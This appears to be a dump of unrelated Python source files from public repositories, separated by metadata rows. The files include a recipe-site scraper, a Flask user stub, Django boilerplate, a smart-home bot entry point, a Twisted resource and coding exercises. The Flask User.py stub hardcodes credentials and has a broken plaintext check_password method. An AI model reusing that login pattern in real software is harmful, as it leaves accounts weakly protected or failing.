recipe_url: URL of the recipe page to scrape.
recipe_category: List of categories associated with the recipe page.
driver: Selenium chrome driver used for scraping.
Returns:
Recipe content packaged in a dictionary. Key-value ma
"""
driver.get(recipe_url)
time.sleep(0.05)
soup = BeautifulSoup(driver.execute_script('return document.body.innerHTML'),'html.parser')
# Recipe ID
recipe_id = recipe_id_from_recipe_url(recipe_url)
# Recipe Title
try:
recipe_title = clean_text(soup.find(class_='intro article-info').find(class_='headline heading-content').get_text())
except:
# When title scrape is failed, mark the recipe's title with an empty string
# TODO(mdp9): Find out why 'intro article-info' class is not found once in a while.
recipe_title = ''
# Recipe Summary
recipe_summary = clean_text(soup.find(class_='recipe-summary').get_text())
# Recipe Breadcrumbs
recipe_breadcrumbs = [clean_text(breadcrumb.get_text()) for breadcrumb in soup.find(class_='content-breadcrumbs').find_all(class_='breadcrumbs__title')]
# Recipe Rating
recipe_rating_average = 0
recipe_rating_count = 0
recipe_rating_detail = dict()
try:
for rating_item in soup.find(class_='recipe-ratings-list').find_all(class_='rating'):
rating_item_stars = int(rating_item.find(class_='rating-stars').find(text=True, recursive=False))
rating_item_count = int(rating_item.find(class_='rating-count').get_text())
recipe_rating_average += rating_item_stars * rating_item_count
recipe_rating_count += rating_item_count
recipe_rating_detail[rating_item_stars] = rating_item_count
except:
# When rating scrape is failed, mark the recipe's rating with -1.
# TODO(mdp9): Find out why 'recipe-ratings-list' class is not found once in a while.
recipe_rating_average = -1
if recipe_rating_count > 0:
recipe_rating_average /= recipe_rating_count
# Recipe Info
recipe_info = dict()
for info_item in soup.find(class_='recipe-info-section').find_all(class_='recipe-meta-item'):
info_header = clean_text(info_item.find(class_='recipe-meta-item-header').get_text()).split(':')[0].lower()
info_body = clean_text(info_item.find(class_='recipe-meta-item-body').get_text())
recipe_info[info_header] = info_body
# Recipe Ingredients
recipe_ingredients = ''
for ingredients_section in soup.find_all(class_='ingredients-section__fieldset'):
# Seperate each section with double new line.
if recipe_ingredients != '':
recipe_ingredients += '\n\n'
recipe_ingredients += '. '.join(clean_text(text=ingredients_section_legend.get_text()) for ingredients_section_legend in ingredients_section.find_all(class_='ingredients-section__legend')) + '\n'
recipe_ingredients += '. '.join(clean_text(text=ingredients_item.get_text()) for ingredients_item in ingredients_section.find_all(class_='ingredients-item'))
# Recipe Directions
recipe_directions = ''
for directions_section in soup.find_all(class_='instructions-section__fieldset'):
# Seperate each section with double new line.
if recipe_directions != '':
recipe_directions += '\n\n'
recipe_directions += '. '.join(clean_text(directions_item.get_text()) for directions_item in directions_section.find_all(class_='instructions-section-item'))
# Recipe Notes
recipe_notes = '. '.join(clean_text(notes.get_text()) for notes in soup.find_all(class_='component recipe-notes'))
# Recipe Nutrition
recipe_nutrition = '. '.join(clean_text(nutrition.get_text()) for nutrition in soup.find_all(class_='nutrition-section container'))
# Recipe Images
main_image_container = soup.find(class_='image-container').find(class_='lazy-image')
recipe_main_image = main_image_container['data-src'] if main_image_container != None else None
recipe_ugc_images = [ugc_photos_link.find('img')['src'] for ugc_photos_link in soup.find(class_='lead-content-wrapper').find_all(class_='ugc-photos-link')]
# Populate data
recipe_json = {
'id': recipe_id,
'url': recipe_url,
'title': recipe_title,
'summary': recipe_summary,
'category': recipe_category,
'breadcrumb': recipe_breadcrumbs,
'rating_average': recipe_rating_average,
'rating_count': recipe_rating_count,
'rating_detail': recipe_rating_detail,
'info': recipe_info,
'ingredients': recipe_ingredients,
'directions': recipe_directions,
'notes': recipe_notes,
'nutrition': recipe_nutrition,
'main_image': recipe_main_image,
'ugc_image': recipe_ugc_images,
}
return recipe_json
def scrape_recipe_sources(recipe_sources, batch_id):
"""Scrape the given list of recipe sources. The scraping is processed with a process assigned with the given batch ID.
Args:
recipe_sources: List of recipe sources. A source contains a 'url', the recipe URL, and 'categories', the categories associated with the recipe page.
batch_id: Batch ID assigned to the process where the scaping is conducted.
Returns:
True if the scraping has been completed for all recipe sources.
"""
options = Options()
options.headless = True
driver = webdriver.Chrome('./chromedriver',options=options)
cache_path = recipe_cache_path(batch_id)
scraped_ids = set()
if path.exists(cache_path):
scraped_ids = set([row[0] for row in pandas.read_csv(RESULT_CSV_PATH, usecols=['id']).values])
else:
with open(cache_path, 'w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
writer.writeheader()
try:
with open(cache_path, 'a') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
for i, recipe_source in enumerate(recipe_sources, start=1):
print('Batch {} processing recipe #{}'.format(batch_id, i))
recipe_id = recipe_id_from_recipe_url(recipe_source['url'])
if recipe_id in scraped_ids:
continue
recipe_content = None
# Sometimes the driver experiences a connection failure. Keep trying to scrape one page until it succeeded.
try:
recipe_content = scrape_single_recipe_url(recipe_source['url'], recipe_source['categories'], driver)
except:
# Instantiate a new driver.
try:
driver.close()
driver.quit()
finally:
time.sleep(1)
driver = webdriver.Chrome('./chromedriver',options=options)
recipe_content = None
writer.writerow(recipe_content)
finally:
driver.close()
driver.quit()
return True
def remove_scraped_recipe_from_list(recipe_sources):
"""Remove all the previously scraped recipe from the given recipe source list.
Args:
recipe_sources: List of recipe sources. A source contains a 'url', the recipe URL, and 'categories', the categories associated with the recipe page.
Returns:
Trimmed recipe sources which all member of the list has not been scraped yet.
"""
scraped_ids = set()
if path.exists(RESULT_CSV_PATH):
scraped_ids = set([row[0] for row in pandas.read_csv(RESULT_CSV_PATH, usecols=['id']).values])
new_recipe_sources = []
for recipe_source in recipe_sources:
recipe_id = recipe_id_from_recipe_url(recipe_source['url'])
if recipe_id in scraped_ids:
continue
new_recipe_sources.append(recipe_source)
print('Number of skipped recipes: {}. They are skipped because their info have been scraped before.'.format(len(recipe_sources)-len(new_recipe_sources)))
return new_recipe_sources
def process_recipe_sources_in_parallel(recipe_sources, num_of_process=5):
"""Process the given list of recipe sources in parallel using a simple multiprocessing where each process is responsible for processing the same number of categories.
Args:
recipe_sources: List of recipe sources. A source contains a 'url', the recipe URL, and 'categories', the categories associated with the recipe page.
num_of_process: Number of process that invoked at the same time for multi-processing. Defaults to 5.
Returns:
True if all the processes have finished running and after the csv caches have been combined into one csv.
"""
start_time = time.perf_counter()
recipe_sources = remove_scraped_recipe_from_list(recipe_sources)
recipe_sources_len = len(recipe_sources)
num_of_recipe_per_process = recipe_sources_len / num_of_process
processes = []
for i in range(num_of_process):
start_index = int(i * num_of_recipe_per_process)
end_index = int((i+1) * num_of_recipe_per_process)
process = multiprocessing.Process(target=scrape_recipe_sources, args=[recipe_sources[start_index:end_index],i])
process.start()
processes.append(process)
for process in processes:
process.join()
finish_time = time.perf_counter()
print('Done scraping', recipe_sources_len, 'recipes in ', round(finish_time-start_time, 2), 'second(s).')
coalesce_recipe_scrape_caches()
return True
def coalesce_recipe_scrape_caches():
"""Combine the previously scraped recipes that were put into separate caches into a single csv file.
Returns:
True if the recipe caches have successfully combined into one csv.
"""
if not path.exists(RESULT_CSV_PATH):
with open(RESULT_CSV_PATH, 'w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
writer.writeheader()
# Coalesce recipe caches one by one.
batch_id = 0
while True:
cache_path = recipe_cache_path(batch_id)
if not path.exists(cache_path):
# Stops when the given cache path is not found. Cache IDs are not sparse.
break
print('Combining data from cached recipes batch {}...'.format(batch_id))
with open(RESULT_CSV_PATH, 'a') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
with open(cache_path) as cache_csv_file:
reader = csv.DictReader(cache_csv_file)
for row in reader:
writer.writerow(row)
# Remove old cache path
os.remove(cache_path)
batch_id += 1
# Sort the csv.
sorted_csv_data = None
with open(RESULT_CSV_PATH, 'r') as csv_file:
reader = csv.DictReader(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
next(reader, None) # Skip the header
sorted_csv_data = sorted(reader, key=lambda row:int(row['id']), reverse=False)
with open(RESULT_CSV_PATH, 'w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
writer.writeheader()
for row in sorted_csv_data:
writer.writerow(row)
return True
if __name__ == '__main__':
if not os.path.exists('chromedriver'):
sys.exit('ERROR: A chromedriver is not found at current directory.\nPlease download at https://chromedriver.chromium.org/downloads.')
if not os.path.exists('cache'):
os.makedirs('cache')
# Update recipe with remaining caches, just in case the program was interrupted previously.
coalesce_recipe_scrape_caches()
# Scrape scrape scrape!
root_url = 'https://www.allrecipes.com/recipes/'
category_root_urls = scrape_root_url(root_url)
process_category_root_urls_in_parallel(category_root_urls)
process_recipe_sources_in_parallel(coalesce_recipe_sources_from_category_cache(category_root_urls)) | [
"[email protected]"
] | |
5f07b6cf6ea1da6ba3a095aa6da467aca68957c8 | 768e37d05aa0b9c8f1a887301a7599603bea45ab | /User.py | a3f828a2c949753f27f3bc3b02011eeb36cd6c05 | [] | no_license | cj-zeiger/eConnect-backend | 4d65703d7b09806bb32fcde474f06e2c6fd7a25d | c2fb020681d8f6e643d8bff7683deda9fc96128d | refs/heads/master | 2021-01-21T02:41:05.551364 | 2015-08-21T17:59:11 | 2015-08-21T17:59:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from flask.ext.login import UserMixin
class User(UserMixin):
username='admin'
password='hashedpassword'
id=1
def check_password(pwd):
if pwd == password:
return True
else:
return False
| [
"[email protected]"
] | |
43c9e638366ac7d934c2a66c18c555501c60eac1 | 28ff818fcf120f52bde8d26dbaa654e951595009 | /APUNTES/PYTHON/EJEMPLOS_FORMACION/web04Django/portal_anuncios_informatica/manage.py | 14379d202cac129b8c4406d35bbb090c00685bf5 | [] | no_license | pcmaestro/my_repository | 9c87382b2c30e5d0985a08ddfa172995de80a45a | 13d47e67a49b5996654a5386c024e61c2c753e6b | refs/heads/master | 2022-07-13T20:38:14.614763 | 2020-08-14T18:58:44 | 2020-08-14T18:58:44 | 234,505,688 | 2 | 0 | null | 2022-06-21T03:58:12 | 2020-01-17T08:32:56 | Python | UTF-8 | Python | false | false | 647 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'portal_anuncios_informatica.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
6726af340507ef18cd6fecb526938ac266e2e837 | c553f9d608c435cd7f19c9be0ef512307295a837 | /daemin/greedy/실전문제/5.볼링공고르기.py | 25466ef2c70cb181a43b4110c060208edd5c5000 | [] | no_license | Green0v0/Algorithm | 2d089e7c016997c1fb5e1094ddeeb80cd1ce0485 | ab9b387e63550ef1b5dfe0f851163b16fbd42c88 | refs/heads/main | 2023-05-24T05:37:17.125671 | 2021-06-16T05:35:52 | 2021-06-16T05:35:52 | 330,944,982 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # n,m = map(int,input().split())
# k= list(map(int,input().split()))
# n,m= 8,5
# k = [1,5,4,3,2,4,5,2]
# import time
# start_time = time.time()
# n,m= 10,3
# data= [1,3,2,3,2,1,2,3,2,3,]
# count =0
"""
1. 인덱스를 사용했다.
2. k[1]!=k[j] 이면 count 했다.(조합// 서로 다른 무게의 볼링공을 고른다!// 무게가 같아도 다른 공으로 생각한다.)
3. k[1]==k[j] 이면 같은 무게 pass
* 문제 설명 예시를 보니까 한번 선택했던거는 다시 선택하지 않고 진행방향으로만 실행되는 것에서 idea를 얻었다.
"""
# for i in range(n):
# for j in range(i+1,n):
# if data[i] !=data[j]:
# count +=1
# else:
# pass
# print(count)
# end_time = time.time()
# print('수행시간 :',end_time - start_time)
# 책 풀이 # 로직을 이해못하겠음
n,m= 5,3
data= [1,3,2,3,2]
array=[0]*11
for i in data:
array[i]+=1
result = 0
for i in range(1, m+1):
n-=array[i]
result += array[i] * n
print(result)
| [
"[email protected]"
] | |
fa3936e9ab8112887d3ad4dbb99d32a2d66b2338 | 40ce4d7545309ca57f0670a3aa27573d43b18552 | /com.ppc.Bot/bot.py | d51d072f2e155cc8c00d88e1c91dc2c47e820314 | [
"Apache-2.0"
] | permissive | slrobertson1/botlab | 769dab97cca9ee291f3cccffe214544663d5178e | fef6005c57010a30ed8d1d599d15644dd7c870d8 | refs/heads/master | 2020-07-28T06:45:37.316094 | 2019-09-18T15:34:08 | 2019-09-18T15:34:08 | 209,341,818 | 0 | 0 | Apache-2.0 | 2019-09-18T15:23:37 | 2019-09-18T15:23:37 | null | UTF-8 | Python | false | false | 19,850 | py | '''
Created on March 27, 2017
This file is subject to the terms and conditions defined in the
file 'LICENSE.txt', which is part of this source code package.
@author: David Moss
'''
import json
import utilities
import domain
import localization
from controller import Controller
def run(botengine):
"""
Entry point for bot microservices
:param botengine: BotEngine environment object, our window to the outside world.
"""
localization.initialize(botengine)
#===========================================================================
# print("INPUTS: " + json.dumps(botengine.get_inputs(), indent=2, sort_keys=True))
#===========================================================================
trigger_type = botengine.get_trigger_type()
triggers = botengine.get_triggers()
print("\n\n")
botengine.get_logger().info("TRIGGER : " + str(trigger_type))
# Grab our non-volatile memory
controller = load_controller(botengine)
# SCHEDULE TRIGGER
if trigger_type & botengine.TRIGGER_SCHEDULE != 0:
schedule_id = "DEFAULT"
if 'scheduleId' in botengine.get_inputs():
schedule_id = botengine.get_inputs()['scheduleId']
controller.run_intelligence_schedules(botengine, schedule_id)
# MODE TRIGGERS
elif trigger_type & botengine.TRIGGER_MODE != 0:
# Triggered off a change of location
botengine.get_logger().info("Trigger: Mode")
for trigger in triggers:
if 'location' in trigger:
mode = trigger['location']['event']
location_id = trigger['location']['locationId']
controller.sync_mode(botengine, mode, location_id)
# DEVICE ALERTS
elif trigger_type & botengine.TRIGGER_DEVICE_ALERT != 0:
# Triggered off a device alert
for trigger in triggers:
if 'device' in trigger:
device_id = trigger['device']['deviceId']
device_object = controller.get_device(device_id)
if device_object is not None:
device_location = trigger['device']['locationId']
updated_devices, updated_metadata = device_object.update(botengine)
for updated_device in updated_devices:
controller.sync_device(botengine, device_location, device_id, updated_device)
controller.device_measurements_updated(botengine, device_location, updated_device)
alerts = botengine.get_alerts_block()
for alert in alerts:
botengine.get_logger().info("Alert: " + json.dumps(alert, indent=2, sort_keys=True))
# Reformat to extract value
alert_params = {}
if 'params' in alert:
for p in alert['params']:
alert_params[p['name']] = p['value']
if alert is not None:
device_object.device_alert(botengine, alert['alertType'], alert_params)
controller.device_alert(botengine, device_location, device_object, alert['alertType'], alert_params)
# MEASUREMENT TRIGGERS
elif trigger_type & botengine.TRIGGER_DEVICE_MEASUREMENT != 0:
# Triggered off a device measurement
for trigger in triggers:
if 'device' in trigger:
device_id = trigger['device']['deviceId']
device_object = controller.get_device(device_id)
if device_object is not None:
device_location = trigger['device']['locationId']
updated_devices, updated_metadata = device_object.update(botengine)
for updated_device in updated_devices:
controller.sync_device(botengine, device_location, device_id, updated_device)
updated_device.device_measurements_updated(botengine)
# Ping any proxy devices to let any sub-microservices know that the proxy is still connected and delivering measurements
if updated_device.proxy_id is not None:
proxy_object = controller.get_device(updated_device.proxy_id)
if proxy_object is not None:
if proxy_object not in updated_devices:
proxy_object.device_measurements_updated(botengine)
controller.device_measurements_updated(botengine, device_location, updated_device)
# FILE UPLOAD TRIGGERS
elif trigger_type & botengine.TRIGGER_DEVICE_FILES != 0:
# Triggered off an uploaded file
file = botengine.get_file_block()
botengine.get_logger().info("File: " + json.dumps(file, indent=2, sort_keys=True))
if file is not None:
device_object = controller.get_device(file['deviceId'])
controller.file_uploaded(botengine, device_object, file)
# QUESTIONS ANSWERED
elif trigger_type & botengine.TRIGGER_QUESTION_ANSWER != 0:
question = botengine.get_answered_question()
botengine.get_logger().info("Answered: " + str(question.key_identifier))
botengine.get_logger().info("Answer = {}".format(question.answer))
controller.sync_question(botengine, question)
# DATA STREAM TRIGGERS
elif trigger_type & botengine.TRIGGER_DATA_STREAM != 0:
# Triggered off a data stream message
data_stream = botengine.get_datastream_block()
botengine.get_logger().info("Data Stream: " + json.dumps(data_stream, indent=2, sort_keys=True))
if 'address' not in data_stream:
botengine.get_logger().warn("Data stream message does not contain an 'address' field. Ignoring the message.")
else:
address = data_stream['address']
if 'feed' in data_stream:
content = data_stream['feed']
else:
content = None
if address != "schedule":
controller.sync_datastreams(botengine, address, content)
else:
controller.run_intelligence_schedules(botengine)
# GOAL / SCENARIO CHANGES
elif trigger_type & botengine.TRIGGER_METADATA != 0:
# The user changed the goal / scenario for a single sensor
for trigger in triggers:
botengine.get_logger().info("Changed device configuration")
if 'device' in trigger:
device_id = trigger['device']['deviceId']
device_object = controller.get_device(device_id)
if device_object is not None:
device_location = trigger['device']['locationId']
if 'spaces' in trigger['device']:
device_object.spaces = trigger['device']['spaces']
else:
device_object.spaces = []
updated_devices, updated_metadata = device_object.update(botengine)
for updated_device in updated_metadata:
controller.sync_device(botengine, device_location, device_id, updated_device)
updated_device.device_metadata_updated(botengine)
controller.device_metadata_updated(botengine, device_location, updated_device)
# LOCATION CONFIGURATION CHANGES
elif trigger_type & botengine.TRIGGER_LOCATION_CONFIGURATION != 0:
# The user changed location configuration settings, such as adding/removing/changing a user role in the location
botengine.get_logger().info("User changed roles")
category = None
previous_category = None
location_access = None
previous_location_access = None
user_id = None
location_id = botengine.get_location_id()
users = botengine.get_users_block()
for user in users:
botengine.get_logger().info("User: {}".format(user))
if 'category' in user:
category = user['category']
if 'prevCategory' in user:
previous_category = user['prevCategory']
if 'locationAccess' in user:
location_access = user['locationAccess']
if 'prevLocationAccess' in user:
previous_location_access = user['prevLocationAccess']
if 'userId' in user:
user_id = user['userId']
controller.user_role_updated(botengine, location_id, user_id, category, location_access, previous_category, previous_location_access)
# DATA REQUEST
elif trigger_type & botengine.TRIGGER_DATA_REQUEST != 0:
# Response to botengine.request_data()
botengine.get_logger().info("Data request received")
data = botengine.get_data_block()
events = {}
imported = False
import importlib
try:
import lz4.block
imported = True
except ImportError:
botengine.get_logger().error("Attempted to import 'lz4' to uncompress the data request response, but lz4 is not available. Please add 'lz4' to 'pip_install_remotely' in your structure.json.")
pass
if imported:
for d in data:
reference = None
if 'key' in d:
reference = d['key']
if reference not in events:
events[reference] = {}
botengine.get_logger().info("Downloading {} ({} bytes)...".format(d['deviceId'], d['compressedLength']))
r = botengine._requests.get(d['url'], timeout=60, stream=True)
events[reference][controller.get_device(d['deviceId'])] = lz4.block.decompress(r.content, uncompressed_size=d['dataLength'])
for reference in events:
controller.data_request_ready(botengine, reference, events[reference])
# DO NOT SAVE CORE VARIABLES HERE.
return
else:
botengine.get_logger().error("bot.py: Unknown trigger {}".format(trigger_type))
# Always save your variables!
botengine.save_variable("controller", controller, required_for_each_execution=True)
botengine.get_logger().info("<< bot")
def load_controller(botengine):
"""
Load the Controller object
:param botengine: Execution environment
"""
logger = botengine.get_logger()
try:
controller = botengine.load_variable("controller")
logger.info("Loaded the controller")
except:
controller = None
logger.info("Unable to load the controller")
if controller == None:
botengine.get_logger().info("Bot : Creating a new Controller object. Hello.")
controller = Controller()
botengine.save_variable("controller", controller, required_for_each_execution=True)
import importlib
try:
analytics = importlib.import_module('analytics')
analytics.get_analytics(botengine).track(botengine, 'reset')
except ImportError:
pass
controller.track_new_and_deleted_devices(botengine)
controller.initialize(botengine)
return controller
#===============================================================================
# Location Intelligence Timers
#===============================================================================
def _location_intelligence_fired(botengine, argument_tuple):
"""
Entry point into this bot
Location intelligence timer or alarm fired
:param botengine: BotEngine Environment
:param argument_tuple: (intelligence_id, argument)
"""
botengine.get_logger().info("\n\nTRIGGER : _location_intelligence_fired()")
controller = load_controller(botengine)
controller.run_location_intelligence(botengine, argument_tuple[0], argument_tuple[1])
botengine.save_variable("controller", controller, required_for_each_execution=True)
botengine.get_logger().info("<< bot (location timer)")
def start_location_intelligence_timer(botengine, seconds, intelligence_id, argument, reference):
"""
Start a relative location intelligence timer
:param botengine: BotEngine environment
:param seconds: Seconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_location_intelligence_timer({}, {})".format(seconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_s(int(seconds), _location_intelligence_fired, (intelligence_id, argument), reference)
def start_location_intelligence_timer_ms(botengine, milliseconds, intelligence_id, argument, reference):
"""
Start a relative location intelligence timer
:param botengine: BotEngine environment
:param milliseconds: Milliseconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_location_intelligence_timer_ms({}, {})".format(milliseconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_ms(int(milliseconds), _location_intelligence_fired, (intelligence_id, argument), reference)
def set_location_intelligence_alarm(botengine, timestamp_ms, intelligence_id, argument, reference):
"""
Set an absolute location intelligence alarm
:param botengine: BotEngine environment
:param timestamp: Absolute timestamp in milliseconds at which to trigger this alarm
:param intelligence_id: ID of the intelligence module to trigger when this alarm fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">set_location_intelligence_alarm({})".format(timestamp_ms))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.set_alarm(int(timestamp_ms), _location_intelligence_fired, (intelligence_id, argument), reference)
def cancel_location_intelligence_timers(botengine, reference):
"""
Cancel all location intelligence timers and alarms with the given reference
:param botengine: BotEngine environment
:param reference: Unique reference name for which to cancel all timers and alarms
"""
botengine.cancel_timers(reference)
def is_location_timer_running(botengine, reference):
"""
Determine if the timer with the given reference is running
:param botengine: BotEngine environment
:param reference: Unique reference name for the timer
:return: True if the timer is running
"""
return botengine.is_timer_running(reference)
#===============================================================================
# Device Intelligence Timers
#===============================================================================
def _device_intelligence_fired(botengine, argument_tuple):
"""
Entry point into this bot
Device intelligence timer or alarm fired
:param botengine: BotEngine Environment
:param argument_tuple: (intelligence_id, argument)
"""
botengine.get_logger().info("\n\nTRIGGER : _device_intelligence_fired()")
controller = load_controller(botengine)
controller.run_device_intelligence(botengine, argument_tuple[0], argument_tuple[1])
botengine.save_variable("controller", controller, required_for_each_execution=True)
botengine.get_logger().info("<< bot (device timer)")
def start_device_intelligence_timer(botengine, seconds, intelligence_id, argument, reference):
"""
Start a relative device intelligence timer
:param botengine: BotEngine environment
:param seconds: Seconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_device_intelligence_timer({}, {})".format(seconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_s(int(seconds), _device_intelligence_fired, (intelligence_id, argument), reference)
def start_device_intelligence_timer_ms(botengine, milliseconds, intelligence_id, argument, reference):
"""
Start a relative device intelligence timer
:param botengine: BotEngine environment
:param milliseconds: Milliseconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_device_intelligence_timer_ms({}, {})".format(milliseconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_ms(int(milliseconds), _device_intelligence_fired, (intelligence_id, argument), reference)
def set_device_intelligence_alarm(botengine, timestamp_ms, intelligence_id, argument, reference):
"""
Set an absolute device intelligence alarm
:param botengine: BotEngine environment
:param timestamp: Absolute timestamp in milliseconds at which to trigger this alarm
:param intelligence_id: ID of the intelligence module to trigger when this alarm fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">set_device_intelligence_alarm({})".format(timestamp_ms))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.set_alarm(int(timestamp_ms), _device_intelligence_fired, (intelligence_id, argument), reference)
def cancel_device_intelligence_timers(botengine, reference):
"""
Cancel all device intelligence timers and alarms with the given reference
:param botengine: BotEngine environment
:param reference: Unique reference name for which to cancel all timers and alarms
"""
botengine.cancel_timers(reference)
def is_device_timer_running(botengine, reference):
"""
Determine if the timer with the given reference is running
:param botengine: BotEngine environment
:param reference: Unique reference name for the timer
:return: True if the timer is running
"""
return botengine.is_timer_running(reference) | [
"[email protected]"
] | |
3a63330cca430681d8d4b604fd35a7e14fa86b32 | 34992e5eb6e3fe59315e6aa3c3d563a1a322951c | /api/migrations/0001_initial.py | f5d0abaed9dbc25f6715edb9f8c41e72e836851b | [] | no_license | momoru-kun/2skin | c997887c4e8556fae1dfbdbf4d84c8f6ae7fb2ea | 7844016c2ab671224993f606c6760233670df2a2 | refs/heads/main | 2023-05-21T15:47:42.428970 | 2021-05-28T08:52:06 | 2021-05-28T08:52:06 | 375,754,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 853 | py | # Generated by Django 3.2.3 on 2021-05-27 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Position',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('price', models.IntegerField()),
('category', models.CharField(choices=[('FL', 'Цветы'), ('DO', 'Веснушки'), ('WO', 'Слова'), ('AN', 'Животные'), ('OT', 'Другое'), ('ON', 'Однушки'), ('SE', 'Наборы')], max_length=2)),
('image', models.FileField(upload_to='images/')),
],
),
]
| [
"[email protected]"
] | |
dd866df1302e2e8618f647e6c5e184141ed4737e | fbe3c6c0ee455716585b3690c53f91e118d9a913 | /site_cfg_template.py | 5bdacb0e4eb1b6ab1eddc6c4b5d0debce12f801a | [
"BSD-3-Clause"
] | permissive | ramosapf/gensei | 904039e335825f31ffe92acd5337b19939af15b7 | 8a8be511b545e1618a3140295a564b09001e095e | refs/heads/master | 2020-12-11T09:15:01.447737 | 2010-04-16T10:35:18 | 2010-04-16T10:35:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | ##
# Template file for site configuration - copy it to site_cfg.py:
# $ cp site_cfg_template.py site_cfg.py
# Sphinx documentation uses numpydoc extension. Set the path here in case it is
# not installed in a standard location.
numpydoc_path = None
| [
"[email protected]"
] | |
ec6dba479fe913a3b5a74210efcd078e598c792c | cdb9bbf3bd7ad65f919fb689c0a13061042092d6 | /flask_twisted/resource.py | e7b46a74e85ddc9c3e7f0b8aff9477a878b20243 | [
"MIT"
] | permissive | melakf2/flask-twisted | 0ea8249e56b6d9137d6090d8aca6ccb0340dbaea | 58fb81944d04dacd705aa06d5feb2908ab5aa8b3 | refs/heads/master | 2021-05-09T08:48:31.846498 | 2018-01-23T21:24:04 | 2018-01-23T21:24:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | # -*- coding: utf-8 -*-
from twisted.web.resource import Resource
class WSGIRootResource(Resource):
def __init__(self, wsgiResource, children):
"""
Creates a Twisted Web root resource.
"""
Resource.__init__(self)
self._wsgiResource = wsgiResource
self.children = children
def getChild(self, path, request):
request.prepath.pop()
request.postpath.insert(0, path)
return self._wsgiResource
| [
"[email protected]"
] | |
86b0406e23ec7ec581e60ad1114296041160f983 | f77dd6bc7cdf87f411de1b5b9bdd8e7674d01938 | /11_B.py | c98659a6641ecb9ba955689a9f91eac5351d4fd6 | [] | no_license | tsukasasuwa/ITP1 | cbc6ac05b85bb1b4a0a4b0d5e5a62930dc10e9bc | b3549533283b5dce7e403d663874d5e7441b3585 | refs/heads/master | 2020-06-28T20:34:07.288808 | 2019-09-27T04:27:15 | 2019-09-27T04:27:15 | 200,335,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,513 | py |
# coding: utf-8
# In[5]:
x = list(map(int, input().split()))
num = int(input())
for i in range(num):
q = list(map(int, input().split()))
if q[0]==x[0]:
if q[1]==x[1]:
print(x[2])
elif q[1]==x[2]:
print(x[4])
elif q[1]==x[4]:
print(x[3])
elif q[1]==x[3]:
print(x[1])
elif q[0]==x[1]:
if q[1]==x[0]:
print(x[3])
elif q[1]==x[3]:
print(x[5])
elif q[1]==x[5]:
print(x[2])
elif q[1]==x[2]:
print(x[0])
elif q[0]==x[2]:
if q[1]==x[0]:
print(x[1])
elif q[1]==x[1]:
print(x[5])
elif q[1]==x[5]:
print(x[4])
elif q[1]==x[4]:
print(x[0])
elif q[0]==x[3]:
if q[1]==x[0]:
print(x[4])
elif q[1]==x[4]:
print(x[5])
elif q[1]==x[5]:
print(x[1])
elif q[1]==x[1]:
print(x[0])
elif q[0]==x[4]:
if q[1]==x[0]:
print(x[2])
elif q[1]==x[2]:
print(x[5])
elif q[1]==x[5]:
print(x[3])
elif q[1]==x[3]:
print(x[0])
elif q[0]==x[5]:
if q[1]==x[1]:
print(x[3])
elif q[1]==x[3]:
print(x[4])
elif q[1]==x[4]:
print(x[2])
elif q[1]==x[2]:
print(x[1])
| [
"[email protected]"
] | |
